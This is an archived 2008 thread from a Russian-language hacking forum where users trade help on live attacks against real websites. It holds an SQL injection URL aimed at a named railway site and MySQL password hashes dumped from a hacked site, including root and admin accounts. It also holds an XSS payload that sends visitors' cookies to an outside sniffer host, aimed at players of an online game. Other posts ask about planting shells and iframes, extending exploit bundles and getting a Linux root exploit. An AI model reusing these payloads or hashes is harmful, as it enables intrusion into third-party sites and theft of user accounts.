ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.04.2008, 18:06
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* Знаю что надо найти *.conf чтоб увидеть полный путь.... Помогите....не получается...
|
|
|
26.04.2008, 20:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Такая трабла - недавно нашел скулю на крупном сайте, начал селектить юзеров из таблицы, но вместо пассов - шифр, явно base64, но расшифровка этого шифра вернула совсем непохожую на пасс строку, думал что хеш, вроде MD5(Base64) но количество символов у разных юзеров меняется, никто не знает, что это за хеш или шифр ?
Examples: VzsGbVZoDDBValUkCCYNdw==
BWcHdAEjVChRMQQz
UWJXZwBnV25XOwUzCmM=
p.s.
Ershik
Хм, вообще то еще Constantine указал на траблу с кодировкой -
convert(file_priv+using+cp1251)
Хэши - MySQL v5.x
rusanov
*2632CF75CFB8987B429348FA90905C86DF24D0A7
root
*97757F6F08362A7CBA6F30E72EB90A73C79168EE
admin
*3D07E0D0A6AB1EB78DA1D222570ED89455FB7045
dummy
*9C47AFA62907DE2D94072B9820EFCA74185D5111
|
|
|
|
27.04.2008, 02:18
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
На100ящий
дефолтные пути к конфигам тут:
https://forum.antichat.ru/thread49775.html
пишешь скриптик или руками через file_priv, далее по накатанной как я написал
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
27.04.2008, 11:49
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
|
|
|
|
27.04.2008, 12:04
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от satana8920
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
если есть file_priv, залить шелл и повесить фрейм 
по другому никак...
|
|
|
|
27.04.2008, 14:08
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Constantine, уже перепробовал все пути вручную и ничего не подходит, как ещё можно найти путь???
|
|
|
|
27.04.2008, 20:38
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 282
Провел на форуме:
1435337
Репутация:
109
|
|
Подскажите какую ни будь статью о добавлении новых сплоитов к связке сплоитов...
|
|
|
|
27.04.2008, 21:03
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203
Репутация:
628
|
|
Сразу к делу.
Проблема с XSS ...
Вот она:
Когда я ввожу XSS ...
а ввожу я его в игру travian.ru он меня перемещат на мой сниффер, но я не знаю , как дать ссылку людям((
примерно вот:
Сначала ввожу: ">
потом no"><script> document.location.href="http://s.netsec.ru/60880.gif?"+encodeURI(document.cookie); </script><
т.е. там speed.travian.ru/allianz.php и всё..а надо чтоб альянс переминовался по "какой нибудь" ссылке... оч прошу - помогите(((
Но там пхп ...я в общем то хз ... попробуйте вот тут:
speed.travian.ru < зарегистрируйтесь , постройте посольство до 3 ЛВЛа... - создайте альянс \и переминуйте его в поле "ally2" ((
Если можно то ответы в 452277469 ! но сюда тоже зайду!
Заранее спасибо! 
===т.е. мне надо СРАЗУ ссылку сделать , чтобы она переминовала альянс и выходила на линк
Подробно обьясню в 452277469 ! TU |
|
|
|
27.04.2008, 21:20
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Кто-небудь знает есть ли прога или скрипт для перебра лимита и сохранении результата??
|
|
|
|
27.04.2008, 21:45
|
|
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900
Репутация:
17
|
|
Кому не сложно,киньте эксплойт для Linux 2.6.9 для получения root'a.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.jpg?667556){kind=avatar}
![Аватар для SQL~In[J]ecTi0n](/avatars/avatar51654.jpg?668056){kind=avatar}
Похожие темы
Линейный вид
